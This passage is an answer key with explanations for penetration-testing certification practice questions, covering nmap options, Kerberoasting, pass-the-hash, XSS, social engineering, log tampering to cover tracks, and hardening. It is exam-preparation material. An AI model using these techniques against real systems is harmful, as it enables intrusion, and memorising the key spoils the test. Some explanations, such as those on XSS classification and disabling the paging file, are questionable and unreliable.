D and E. In this example, the organization’s SSL/TLS certificate was signed using the SHA256 cryptographic hash function. In addition, it can be seen that the organization uses the IIS web server, which runs on top of Windows Server.

Answer 76

A

A. This output was created by the whois utility. This OSINT tool is used to gather public information about the target organization’s domain.

Answer 77

A

A and B. Both the stored/persistent and reflected XSS exploits are considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.

Answer 78

A

D. The –iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the –iR 50 option with the nmap command.

Answer 79

A

C. This is also an example of DNS cache poisoning. Instead of poisoning the local DNS cache on workstations, the cache of the caching-only DNS server has been poisoned in this scenario. The poisoned records will remain in the cache until the TTL value is reached.

Answer 80

A

D and E. The EternalBlue and WannaCry exploits are facilitated by weaknesses in the SMB protocol. The EternalBlue exploit takes advantage of the fact that SMBv1 mishandles exploit packets, allowing attackers to remotely execute malicious code on the system running the SMB protocol. WannaCry is a form of ransomware that uses EternalBlue to gain access to vulnerable systems and install itself.

Answer 81

A

A. The “Store passwords using reversible encryption” policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don’t require it.

Answer 82

A

D. The recon-ng utility provides a web reconnaissance framework that allows you to conduct open source reconnaissance about an organization on the Web. In this example, all the public-facing servers associated with the domain name specified along with their IP addresses have been displayed.

Answer 83

A

A and C. To harden a Windows-based computer system, you should consider installing extra system RAM and then disable the Windows paging file. This prevents sensitive data that is supposed to be stored only in unencrypted format in RAM from being written to the hard disk page file. You should also disable any unneeded services.

Answer 84

A

A and C. When declaring a variable, PowerShell uses a syntax of $variable_name = value.

Ruby uses the same syntax when declaring a global variable.

Answer 85

A

A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker is using the social engineering principle of authority. They were hoping that by Sue in finance receiving an email from the president of the company, there would be no questions asked and the transfer would take place. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 86

A

D. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools. Kerberoasting is a four-step process:
1. Scan Active Directory for user accounts with service principal names (SPNs) set.
2. Request service tickets using the SPNs.
3. Extract the service tickets from memory and save to a file.
4. Conduct an offline brute-force attack against the passwords in the service tickets.

Answer 87

A

A. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Spear phishing is aimed at specific individuals rather than a broader group. SMS phishing (or smishing) is phishing via SMS messages. SMS stands for Short Message Service. It is a way to send and receive text messages or short emails with a cell phone. An SMS attack is an attempt to obtain personal information by tricking the individual with a text message or by getting them to go to a fake website and enter personal information. In this scenario, you want to target one particular individual rather than a group.

Answer 88

A

A. A PIN is an example of something you know.

Answer 89

A

B and C. External penetration testing teams are hired for the express purpose of performing penetration tests. Because they aren’t directly employed by the organization, they tend to have a higher degree of independence. They don’t have to worry about upsetting a manager or director if vulnerabilities are discovered. In fact, they usually delight in such an event. Also, they tend to be less biased because they don’t participate in the design or ongoing maintenance of the organization’s network infrastructure.

Answer 90

A

C. The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

Answer 91

A

B and D. When declaring a variable, both Bash and Python use the same syntax: variable_name = value.

Answer 92

A

B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.

Answer 93

A

A. After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete.

Answer 94

A

A. Credentialed scans are scans in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that may not be seen from the network. Credentialed scans are widely used in enterprise vulnerability management programs and are a useful tool when performing a penetration test. Credentialed scans may access operating systems, databases, and applications. Credentialed scans typically only retrieve information from target servers and do not make changes to the server itself.

Answer 95

A

C. When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = “value” .

In this example, the line $Target.HostName = ‘FS1’ assigns a value of FS1 to the element named HostName within the Target array.

Answer 96

A

D. Cross-compiling code is used when a target platform is on a different architecture. The tester may not have access to a compiler on the target machine or may need to compile the code for an exploit from the primary workstation, which is not the same architecture as the target.

Answer 97

A

B and E. The ROE should specify when and how communications will occur between you and the client. Should you provide daily or weekly updates, or will you simply report when the test is complete? The ROE should also specify the behaviors allowed on the part of the target. For example, engaging in defensive behaviors such as shunning or blacklisting could limit the value of the test.

Answer 98

A

C. This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester’s network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester’s device.

Answer 99

A

C. The “Reset account lockout counter after” Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0. This policy setting helps prevent brute-force attacks by significantly increasing the amount of time required to conduct the attack.

Answer 100

A

C. Badge cloning occurs when an attacker makes a copy of a valid access badge in order to enter a facility. By copying a valid badge’s RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization’s facility using the authorized employee’s credentials.

Answer 101

A

A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.

Answer 102

A

A and B. John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.

Answer 103

A

A and D. When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.

Answer 104

A

D. Black box tests, sometimes called zero knowledge tests, are intended to replicate what an outside attacker would encounter. Testers are not provided with access to or information about an environment, and instead, they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems as an attacker would.

Answer 105

A

D. Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.

Answer 106

A

A. The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.

Answer 107

A

C and D. PowerShell (PS) Remoting allows you to run PowerShell cmdlets remotely on other Windows systems in your network environment. Windows Remote Management (WinRM) is a system that allows Windows administrators to manage remote systems using the WS Management protocol.

Answer 108

A

A. People can be motivated to act if they think that everyone else is doing the same thing. This is called social proof. The (flawed) assumption is that if everyone else is doing something, it must be the right thing to do.

Answer 109

A

C. A script kiddie usually lacks the technical sophistication to mount an attack using their own tools. Instead, they typically download existing tools and run them. Because these tools are already known to the cybersecurity community, script kiddies generally pose less of a threat than the other types of actors in the adversary tier list.

Answer 110

A

D. When nmap indicates a port is filtered, it usually means the associated service is installed and running, but a host firewall is blocking the port.

Answer 111

A

C. A stealth scan enumerates hosts on the target network by sending them a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner.

Answer 112

A

B. The term trusted agent refers to an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.

Answer 113

A

A. Adding the TargetHost = input(‘Please enter a hostname:’) line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 114

A

A. The chage command can be used on Linux systems to automatically lock user accounts after a certain time. This prevents stale user accounts from being used by an attacker or disgruntled former employee to gain unauthorized access.

Answer 115

A

A. If the directory transversal has been allowed in the web server’s configuration, then it could potentially expose the file system of the web server to users accessing the site in a web browser, including directories outside of the web server’s root directory. For example, the Apache web server can be run in a chroot jail to prevent users from accessing directories outside of the web server’s directories.

Answer 116

A

D. Race conditions occur when the security of a code segment depends upon the sequence of events occurring within the system. The time-of-check-to-time-of-use (TOCTTOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.

Answer 117

A

A. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers because it would likely result in criminal charges against the tester as well as civil litigation.

Answer 118

A

D. This is an example of a pass-the-hash exploit. In this exploit, the tester captures hashed NTLM user credentials and then reuses them to authenticate at a later point in time to a Windows system. Because NTLM authentication uses hashed credentials, the tester doesn’t need to know the victim’s actual username and password. The hashed credentials are sufficient to create a new authenticated session.

Answer 119

A

C. An if/then flow control structure in Bash uses the following syntax:
- if condition then
- commands…
- else
- commands…
- fi

Answer 120

A

B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Answer 121

A

A. Impersonation involves disguising oneself as another person to gain access to facilities or resources. This may be as simple as claiming to be a staff member or as intricate as wearing a uniform and presenting a fake company ID. In this scenario, the attacker called the help desk technician pretending to be an employee.

Answer 122

A

A and C. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used shoulder-surfing techniques to gather sensitive information from employees.

Answer 123

A

B. A Trojan is a type of malware that provides a useful function but secretly performs malicious actions when it is run. For example, it may provide an entertaining game that the user enjoys playing. However, in the background, it could be running a keylogger, creating a backdoor, or even making the system a zombie in a botnet.

Answer 124

A

B. Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 125

A

B. The whois command can be used to gather information from public records about who owns a particular domain.

Answer 126

A

A. After a penetration test, it is critical that you communicate what happened and what was discovered to the client. During the attestation of findings process, you communicate detailed evidence of what you discovered to the client. The client can then use this information to remediate the problems found.

Answer 127

A

D. In a jamming attack, the penetration tester transmits a radio signal in the 2.4 GHz and/or 5 GHz frequency ranges that is powerful enough to disrupt the legitimate wireless signal. This disruption prevents users from using the wireless network. As such, this exploit can be classified as a network stress test or denial-of-service attack.

Answer 128

A

A and D. DLL hijacking and scheduled tasks can both help retain persistence for an exploit on a Windows system. DLL hijacking causes the exploit contained in the malicious DLL to be loaded every time a linked application is started. Using scheduled tasks ensures that an exploit is run on a regular basis.

Answer 129

A

B. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. Typically, they want to expose perceived corruption or gain attention for their cause. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.

Answer 130

A

B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.

Answer 131

A

A. Piggybacking occurs when an intruder tags along with one or more an authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.

Answer 132

A

B. When nmap indicates a port is open, it usually means the associated service is installed, is running, and is accessible through the host firewall.

Answer 133

A

B. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory.

Answer 134

A

A and C. Because this is a gray box test, you can expect to have limited network access and limited storage access. Essentially, you can expect to have a level of knowledge and access similar to what the average employee within the organization would have.

Answer 135

A

C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

Answer 136

A

A. In a cross-site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party. In this scenario, the attacker has developed an application that will target web browsers and permit access to a user’s banking information in the process, stealing money and transferring it to another account.

Answer 137

A

B. Adding the print (TargetHost) line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 138

A

B. JPCERT is the Japanese government’s version of the U.S. government’s Computer Emergency Response Team (CERT). JPCERT maintains a website at https://www .jpcert.or.jp/english/ that provides a dynamic summary of current security alerts and advisories.

Answer 139

A

C. Metasploit is launched by running msfconsole from the command line. MSFconsole is located in the /usr/share/metasploit framework/msfconsole directory.

Answer 140

A

B. After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.

Answer 141

A

B. In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.

Answer 142

A

C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Answer 143

A

A. The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.

Answer 144

A

C and E. When requesting internal architectural diagrams as a part of a white box test, you should typically be supplied with documentation such as network diagrams and facility maps. You can use this information to map out the network topology and locate key infrastructure devices, such as switches, routers, and servers.

Answer 145

A

A. The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.

Answer 146

A

A. Implementing a mantrap at the main entrance is an example of a technological mitigation strategy.

Answer 147

A

C. In this example, you would enter telnet 10.0.0.1 80 at the shell prompt of your Linux system to grab the banner of the target web server.

Answer 148

A

D. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The second D in DAD stands for denial, which refers to preventing the legitimate use of information or systems. In this scenario, Jessica has executed a denial of service (DoS) attack against the file server, denying legitimate access to it.

Answer 149

A

D and E. An advanced persistent threat (APT) is a prolonged targeted attack in which the attacker gains access to a network and remains there undetected for an extended period of time. As such, only an organized crime or nation-state actor is likely to have the level of sophistication and the funds required to carry out such an attack. Script kiddies, hacktivists, and malicious insiders usually lack the technical expertise and/or the funds necessary to carry out an APT.

Answer 150

A

B. Three-factor authentication (3FA) requires users to supply factors from three different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), a fingerprint scan (something you are), and a one-time password (something you have) constitutes 3FA authentication.

Answer 151

A

A. One way to leveraging an open SMTP service to send unauthorized email messages is to connect to the SMTP server’s IP address on port 25 using a Telnet client. Once the connection has been established, you can use the command-line interface to create and send the messages.

Answer 152

A

C. Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the CEO is receiving telephone calls, this is a vishing attack.

Answer 153

A

D. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate any user and group accounts that can be discovered. You will also want to enumerate any network shares that can be identified.

Answer 154

A

A. Most people will help someone they perceive to be a friend. This is called likeness. When someone they believe to be a friend needs help, they may bend or break the rules to help the person out.

Answer 155

A

A. Websites use HTTP cookies to keep sessions over time. If a tester is able to get a copy of the user’s session cookie, then they can use that cookie to impersonate the user’s browser and hijack the authenticated session. Attackers who are able to acquire the session cookie used to authenticate a user’s web session can hijack that session and take charge of the user’s account. Cookies used for authentication should always be securely created and transmitted only over secure, encrypted communications channels.

Answer 156

A

B. A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Answer 157

A

C. People can be motivated to act quickly when they believe something they want is in limited supply. This is called scarcity. They don’t want to miss out on an opportunity, product, deal, or service that will soon become unavailable.

Answer 158

A

B. Because full connections are established with each host during a full vulnerability scan, they can be thoroughly interrogated and fingerprinted. As a result, a full scan usually produces the most accurate information. However, they are also the easiest to detect by defenders.

Answer 159

A

A and F. One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses.
- -iL : This is the input from list of hosts/networks.
- -sV: This probes open ports to determine service/version info.

Answer 160

A

B. The –top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The –exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.

Answer 161

A

A. A Windows domain controller hosts many domain-related services. Therefore, most domain controllers will have many ports open. Most will include the following:
- Port 88: Used for Kerberos authentication.
- Port 135: Used for communications between domain controllers and clients as well as between domain controllers.
- Ports 138 and 139: Used for file replication between domain controllers.
- Port 389: Used for LDAP queries.
- Port 445: Used for SMB/CIFS file sharing.
- Port 464: Used for Kerberos password change.
- Port 636: Used for secure LDAP queries.
- Ports 3268 and 3269: Used for Global Catalog communications.
- Port 53: Used for DNS name resolution.

Answer 162

A

B. The penetration tester is using urgency (and possibly likeness) as a motivating factor. The employee will probably comply with the request out of a desire to be seen as a “team player.” This type of attack can be made even more effective by conducting reconnaissance beforehand and identifying the names of real sales reps working for the organization.

Answer 163

A

A. Wi-Fi Protected Access 2 – Pre-Shared Key (WPA2-PSK) is a method of securing a network using WPA2 with the use of the optional Pre-Shared Key (PSK) authentication. To encrypt a network with WPA2-PSK, you provide a router with a plain English passphrase between 8 and 63 characters long. Wi-Fi deauthentication attacks are a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point. A tester can send a deauthentication frame at any time to a wireless access point, with a spoofed address for the victim.

Answer 164

A

B. A static code analysis (also called a source code analysis) is happening in this scenario. In this type of test, the tester accesses an application’s source code and reviews it for weaknesses that could be exploited. Obviously, the tester must have a strong programming background to be able to do this kind of review.

Answer 165

A

D and E. The penetration tester used shoulder surfing and business email compromise techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. In this example, the tester used shoulder surfing to gather the employee’s email username and passwords. The tester then used the compromised account to gather information from other employees. This is called business email compromise.

Answer 166

A

B. Key stretching involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of rainbow table needed for a precomputation attack to work.

Answer 167

A

C. Because the server is considered a fragile system, you should throttle the bandwidth used by the vulnerability scan. If you don’t, you could easily consume all the server’s resources with the scan and not leave any for critical business operations. You can use the -Tn option with the nmap command to throttle down the scans. In this scenario, you should consider using either the –T2 or possibly even the –T1 option with the nmap command. The –T0 option would probably throttle the scan too much, making it take an inordinate amount of time to complete.

Answer 168

A

D. Passive scanning is a method of vulnerability detection that relies on information obtained from network data that is captured from a target computer without direct interaction. The main advantage of passive scanning for an attacker is that it does not leave a trail that could alert users or administrators. The main advantage for administrators is that it doesn’t cause undesired behavior on the target computer. Passive scanning does have limitations. It is not as complete in details as an active vulnerability scan and cannot detect any applications that are not currently sending out traffic.

Answer 169

A

B. This is an example of a cross-site request forgery (CSRF). Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user’s password contained in the email message didn’t require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.

Answer 170

A

A. This is also an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server. In a relay attack, the man-in-the-middle may or may not modify the data being transmitted between the two hosts.

Answer 171

A

B. In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Answer 172

A

C. The nmap 192.168.1.0/24 –exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.

Answer 173

A

B. Implementing regular security awareness training for all employees is an example of a people-based mitigation strategy.

Answer 174

A

D. To harden a Windows-based computer system, you should disable autorun. This helps prevent malware from being installed on the system when an infected optical disc or USB drive is inserted into the system.

Answer 175

A

B. A false positive is an error in some evaluation processes in which a condition tested for is mistakenly found to have been detected. The scanner might not have sufficient access to the target system to confirm a vulnerability, or it might simply have an error in a plug-in that generates an erroneous vulnerability report. When a scanner reports a vulnerability that does not exist, this is known as a false positive error.

Answer 176

A

D. A red team assessment is usually conducted by internal testers to ensure an organization’s IT staff (the blue team) can adequately defend the network. A goal-based assessment is designed to test a specific aspect of an organization’s security. A supply chain test involves testing an organization’s vendors. A compliance-based test is performed to ensure that an organization remains in compliance with governmental regulations or corporate policies.

Answer 177

A

A and D. Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.

Answer 178

A

A. Advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 179

A

D. The National Vulnerability Database (NVD) is maintained by the U.S. government’s National Institute of Science and Technology. The NVD can be accessed at https://nvd .nist.gov. This website provides a summary of current security vulnerabilities ranked by their severity.

Answer 180

A

A. When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 181

A

A. When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, …).

Answer 182

A

C and D. In the process of covering your tracks, you should consider taking actions such as removing or hiding any files you copied to the system. You could also consider altering any log entries that were created when you compromised the system. However, there are two things to keep in mind when modifying log files. First, make sure the scope of work for the penetration test allows you to modify log files. Sometimes it will not be allowed. Second, you should not delete all the log entries. This would be a dead giveaway to a defender that you have compromised the system.

Answer 183

A

C. Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a Bash script will send both stdout and stderr to the same file.

Answer 184

A

A. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. A white box test is performed with full knowledge of the underlying network. In a black box test, the testers are not provided with access to or information about the target environment. Compliance-based assessments are designed to test compliance with specific laws.

Answer 185

A

D. Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 186

A

C. The statement of work (SOW) is a formal document that defines the scope of the penetration test. It identifies exactly what will happen during the test. An MSA defines terms that will govern future agreements. An NDA specifies what each party in an agreement is allowed to disclose to third parties. A purchase order is a binding agreement to make a purchase from a vendor.

Answer 187

A

C. Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the president is receiving telephone calls, this is a vishing attack.

Answer 188

A

A and B. In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates the weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server).

Answer 189

A

A and E. The scope document must specify, among other things, why the test is being performed and who the target audience is. The other options listed in this question may be included if necessary, but they are not required.

Answer 190

A

C and E. In this example, you know that the device is running the Apache web server. Also notice that the name of the device is “Untangle Server.” By searching the Internet, you can learn that Untangle sells security devices used to manage traffic coming in and out of a network. Therefore, you can reasonably assume that the device is a security device from this company.

Answer 191

A

B. Hiring additional IT staff members who have experience with cyber security is an example of a people-based mitigation strategy.

Answer 192

A

A and C. From a network topology perspective, the PCI-DSS standard requires you to run vulnerability scans from both internal and external network locations. The results of both scans should be compared to identify vulnerabilities.

Answer 193

A

B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.

Answer 194

A

A. The Common Vulnerabilities and Exposures (CVE) database is a community-developed resource that contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor anywhere in the world discovers a vulnerability with their product, they add an entry to the CVE database. You could search the CVE site for information about Server 2003 SP2.

Answer 195

A

A. The “Enforce password history” Group Policy setting determines the number of unique new passwords that a user must use before an old password can be reused again. Configuring this policy helps enhance security by preventing users from reusing old passwords.

Answer 196

A

B. Because the tester is given extensive internal access to the target network, a white box test usually provides the most exhaustive assessment. More time can be spent probing for deep vulnerabilities than is possible with a black or gray box test.

Answer 197

A

C. A SMS phishing attack (also called a smishing attack) leverages text messaging instead of email to conduct a phishing exploit.

Answer 198

A

D. The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application’s source code, they would have access to the database authentication credentials.

Answer 199

A

A. The –T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

Answer 200

A

A. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, one of the requirements specifies that antivirus software be installed on all systems and that it must be updated regularly.

Answer 201

A

D. A compliance vulnerability scan is used to verify that the target organization is in compliance with the requirements of a given law or policy. In this example, a PCI-DSS penetration test usually requires a PCI-DSS compliance vulnerability scan.

Answer 202

A

C. A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA, which will define the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.

Answer 203

A

A. By sending fake ARP messages, the tester’s workstation can fool client workstations into thinking it is the web server by associating the server’s IP address with her workstation’s MAC address. Likewise, the server can be fooled into thinking her workstation is the end user’s workstation by doing the same thing, sending a fake ARP message to the server mapping the client’s IP address to her workstation’s MAC address.

Answer 204

A

C. In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@[]^_’{|}~. This will make it harder for attackers to break into the client’s systems.

Answer 205

A

B. One way to conduct a NAC bypass exploit is to spoof the tester’s system with the MAC address of an authorized device. As long as the tester’s system meets the organization security policy requirements, the NAC system should allow it to access the production network.

Answer 206

A

B. Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network. This can be useful because IoT devices frequently employ weaker security mechanisms that a penetration tester can exploit.

Answer 207

A

A. Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy.

Answer 208

A

A. The Internet of Things (IoT) refers to the network of physical products and devices that connect to the Internet. Manufacturers and developers want to minimize costs to increase their profits. Hence, security is often not the key feature of the product or device. So, as with any other device on a network, IoT devices may have security vulnerabilities and may be subject to network-based attacks.

Answer 209

A

C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.

Answer 210

A

B. Risk response is the process of controlling identified risks. It is a basic step in any risk management process. Risk response is a planning and decision-making process where the client decides how to deal with each risk. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. This is scenario, the client used risk avoidance by removing the door and putting up a wall.

Answer 211

A

A. An effective way to discover vulnerabilities associated with a specific version of an operating system is to consult the Common Vulnerabilities and Exposures (CVE) database. The CVE database can be accessed at http://cve.mitre.org. It contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor discovers a vulnerability with their product, they add an entry to the CVE database. This database contains vulnerability information for Windows, Mac OS, Linux, UNIX, Android, and iOS operating systems.

Answer 212

A

A. A rainbow table contains a precomputed list of hash values for common passwords that can be used for offline password file cracking.

Answer 213

A

B. The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.

Answer 214

A

B and C. The output of the sslyze command in this example shows that the web server responded to TLSv1_1 and TLSv1_2 queries but did not respond to SSLv2, SSLv3, or TLSv1 queries.

Answer 215

A

D. The JTAG port is implemented in motherboards made by some manufacturers for diagnostic and testing purposes. With the right equipment, a penetration tester can connect to this port and capture data directly from the running motherboard.

Answer 216

A

B. Before Aircrack-ng can be used to crack the encryption on a wireless network, you must first run the airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake. Then, you need to de-authenticate the wireless client by running the aireplay-ng utility.

Answer 217

A

A. A man-in-the-middle attack happens when communication between two parties is intercepted by an outside entity. Man-in-the-middle attacks are a common kind of cybersecurity attack that allows an attacker to eavesdrop on the communication between two targets. The attack takes place in between two legitimately communicating hosts, allowing the attacker to “listen” to a conversation.

Answer 218

A

B and E. Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important as well, but in this scenario the question is which are the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Answer 219

A

C. A full scan will provide you with more useful results because it includes more tests. There is no requirement in the scenario that the tester should avoid detection, so a stealth scan is not necessary. But because this is a black box test, it would best to run a full scan on the network.

Answer 220

A

